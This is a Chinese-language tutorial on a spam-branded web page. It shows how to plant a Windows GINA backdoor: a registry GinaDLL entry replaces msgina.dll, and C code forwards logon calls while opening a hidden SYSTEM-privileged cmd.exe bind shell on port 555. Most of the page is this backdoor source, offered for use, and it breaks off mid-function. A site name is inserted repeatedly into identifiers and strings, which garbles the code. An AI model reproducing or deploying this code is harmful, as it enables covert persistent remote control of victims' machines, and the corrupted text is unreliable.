快捷搜索:  as  2018  FtCWSyGV  С˵  test  xxx  Ψһ  w3viyKQx

澳门新匍京1_龟发之家论坛



首先要先容Gina的在windows中的感化。NT,2K等都是多用户的系统,在进入用户shell前都有一个身份验证的历程。这个验证的历程便是由我们的Gina完成的。Gina除了验证用户身份以外还要供给图形登岸界面。系统默认的Gina是msgina.dll你能在系统目录system32下找到。微软除了供给了默认的Gina还容许自定义开拓Gina调换掉落msgina.dll实现自己的一些认证要领。这就为我们的后门供给了前提,要调换掉落系统默认加载msgina.dll很简单只要编辑注册表在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon项下面加入一个类型为REG_SZ名为GinaDLL的一个键值.数据填写我们调换的GinaDLL的名字就OK了。

例如:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"GinaDLL"="ginadll.dll"(ginadll.dll就我们自己的用来调换的Gina)

在我们自己的DLL中只要邦定一个SHELL,其他的直接调用msgina.dll就行了。说白了就安装一其中心层。使其达到一个后门的目的。Gina是加载到winlogin进程中的,winlogin是系统的用户交互登岸进程是SYSTEM权限的,是以我们的后门也有SYSTEM权限。这对付后门来说是再好不过了。

因为我们一共要调换15个Gina函数。整个写出来来量相昔时夜。我们就选几个紧张的出来做做示范。其他的也差不多就直接往下一层的msgina.dll调用就行了。具体的请参考完备源代码。

typedef BOOL (WINAPI *PFUNCWLXNEGOTIATE)( DWORD, DWORD* );

typedef BOOL (WINAPI *PFUNCWLXINITIALIZE)( LPWSTR, HANDLE, PVOID, PVOID, PVOID* );

typedef VOID (WINAPI *PFUNCWLXDISPLAYSASNOTICE)( PVOID );

typedef int (WINAPI *PFUNCWLXLOGGEDOUTSAS)( PVOID, DWORD, PLUID, PSID, PDWORD, PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *);

typedef BOOL (WINAPI *PFUNCWLXACTIVATEUSERSHELL)( PVOID, PWSTR, PWSTR, PVOID );

typedef int (WINAPI *PFUNCWLXLOGGEDONSAS)(澳门新匍京1 PVOID, DWORD, PVOID );

typedef VOID (WINAPI *PFUNCWLXDISPLAYLOCKEDNOTICE)( PVOID );

typedef int (WINAPI *PFUNCWLXWKSTALOCKEDSAS)( PVOID, DWORD );

typedef BOOL (WINAPI *PFUNCWLXISLOCKOK)( PVOID );

typedef BOOL (WINAPI *PFUNCWLXISLOGOFFOK)( PVOID );

typedef VOID (WINAPI *PFUNCWLXLOGOFF)( PVOID );

typedef VOID (WINAPI *PFUNCWLXSHUTDOWN)( PVOID, DWORD );

typedef BOOL (WINAPI *PFUNCWLXSCREENSAVERNOTIFY)( PVOID, BOOL * );

typedef BOOL (WINAPI *PFUNCWLXSTARTAPPLICATION)( PVOID, PWSTR, PVOID, PWSTR );

typedef BOOL (WINAPI *PFUNCWLXNETWORKPROVIDERLOAD) (PVOID, PWLX_MPR_NOTIFY_INFO);

后门要用到的全局变量

//管道

HANDLE hStdOut = NULL, hSRead = NULL;

HANDLE hStdInput = NULL, hSWrite = NULL;

//用来节制线程是否停止返回

BOOL bExit = FALSE;

//保存创建的CMD进程语柄

HANDLE hProcess = NULL;

//这个是Winlogon进程最先调用的函数,用来反省Gina支持的winlogin版本

BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDl澳门新匍京1lVersion)

{

HINSTANCE hDll=NULL;

if( !(hDll = LoadLibrary( "msgina.dll" )) )

return FALSE;

//取得msgina.dll中的WlxNegotiate函数进口

PFUNCWLXNEGOTIATE pWlxNegotiate = (PFUNCWLXNEGOTIATE)GetProcAddress( hDll, "WlxNegotiate" );

if( !pWlxNegotiate )

return FALSE;

//往下层调用

return pWlxNegotiate( dwWinlogonVersion, pdwDllVersion );

}

//为一个特其余窗口站初始化一个GinaDLL

BOOL WINAPI WlxInitialize( LPWSTR lpWinsta, HANDLE hWlx,

PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext)

{

HINSTANCE hDll=NULL;

if( !(hDll = LoadLibrary( "msgina.dll" )) )

return FALSE;

PFUNCWLXINITIALIZE pWlxInitialize = (PFUNCWLXINITIALIZE)GetProcAddress( hDll,"WlxInitialize" );

if( !pWlxInitialize )

return FALSE;

//初始化windows socket的WS2_32.DLL

WSADATA WSAData;

if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)

return FALSE;

//同上往下调用

return pWlxInitialize( lpWinsta, hWlx, pvReserved,pWinlogonFunctions,pWlxContext );

}

//Winlogon在没有用户登岸时接管到一个SAS事故调用这个函数

int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType,

PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions,

PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,

PVOID *pProfile)

{

HINSTANCE hDll=NULL;

if( !(hDll = LoadLibrary( "msgina.dll" )) )

return FALSE;

PFUNCWLXLOGGEDOUTSAS pWlxLoggedOutSAS = (PFUNCWLXLOGGEDOUTSAS)GetProcAddress( hDll, "WlxLoggedOutSAS" );

if( !pWlxLoggedOutSAS )

return FALSE;

HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥工具

WaitForSingleObject(hmutex,INFINITE);

//后门的主线程开始。

CreateThread(NULL,NULL,StartInit,NULL,NULL,NULL);

ReleaseMutex(hmutex);

CloseHandle(hmutex);

//调用下层的WlxLoggedOutSAS.

int ret = pWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId, pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile );

return ret澳门新匍京1;

}

//StartInit线程

DWORD WINAPI StartInit(PVOID lp)

{

SOCKET sock=NULL;

//建立一个TCP SOCKET

sock = socket (AF_INET,SOCK_STREAM,IPPROTO_TCP);

SOCKADDR_IN addr_in = {0};

addr_in.sin_family = AF_INET;

addr_in.sin_port = htons(555); //端口号,可以自己改

addr_in.sin_addr.S_un.S_addr = htonl(INADDR_ANY);

//绑定到555端口上

if(bind(sock,(sockaddr *)&addr_in,sizeof(sockaddr))==SOCKET_ERROR)

return 1;

//侦听

listen(sock,1);

sockaddr_in sin={0};

int size = sizeof(sin);

while ( TRUE )

{

//吸收一个连接的哀求返回一个SOCKET没有哀求则不停澳门新匍京1壅闭

//在一个连接断开后又返回等待别的的连接

SOCKET recvSock=accept(sock,(sockaddr *)&sin,&size);

if ( recvSock == INVALID_SOCKET ) {

Sleep(1000);

continue;

}

HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥工具

WaitForSingleObject(hmutex,INFINITE);

//创建后门

HANDLE hThread = CreateThread(NULL,NULL,BackDoor,&recvSo澳门新匍京1ck,0,NULL);

ReleaseMutex(hmutex);

CloseHandle(hmutex);

//等待BackDoor线程停止。

WaitForSingleObject(hThread,INFINITE);

bExit = FALSE;

}

return 1;

}

//BackDoor线程

DWORD WINAPI BackDoor (LPVOID lp)

{

//可以自己在这里加上一些密码认证等功能

//用来设置管道可被子进程承袭

SECURITY_ATTRIBUTES sa;

sa.bInheritHandle =TRUE;

sa.nLength = sizeof(sa);

sa.lpSecurityDescriptor = NULL;

//创建管道

CreatePipe ( &hSRead, &hStdOut, &sa, 0 );

CreatePipe ( &hStdInput, &hSWrite, &sa, 0 );

STARTUPINFO StartInfor = {0};

PROCESS_INFORMATION ProInfor = {0};

//重定向子进程的标准输入输出,为我们刚刚建立好的管道

StartInfor.cb = sizeof ( STARTUPINFO );

StartInfor.wShowWindow = SW_HIDE;

StartInfor.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

StartInfor.hStdOutput = StartInfor.hStdError = hStdOut;

StartInfor.hStdInput = hStdInput;

//取得CMD的完备路径

TCHAR SysDir[MAX_PATH] = {0};

GetSystemDirectory(SysDir,MAX_PATH);

if ( SysDir[strlen(SysDir)-1] != '\\')

strcat(SysDir,"\\");

strcat(SysDir,"cmd.exe");

HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥工具

WaitForSingleObject(hmutex,INFINITE);

//创建CMD子进程

CreateProcess(NULL,SysDir,NULL,NULL,TRUE,NULL,NULL,NULL,&StartInfor,&ProInfor);

hProcess = ProInfor.hProcess;

//因为我们纰谬CMD的进出输出进行操作以是我们可以关闭

CloseHandle(hStdOut);

CloseHandle(hStdInput);

HANDLE hArray[2] = {0};

//创建一个接管敕令线程和一个返回结果的线程

hArray[0] = CreateThread (NULL,NULL,RecvThread,&sock,NULL,NULL);

hArray[1] = CreateThread (NULL,NULL,SendThread,&sock,NULL,NULL);

ReleaseMutex(hmutex);

CloseHandle(hmutex);

//等待2个线程

您可能还会对下面的文章感兴趣: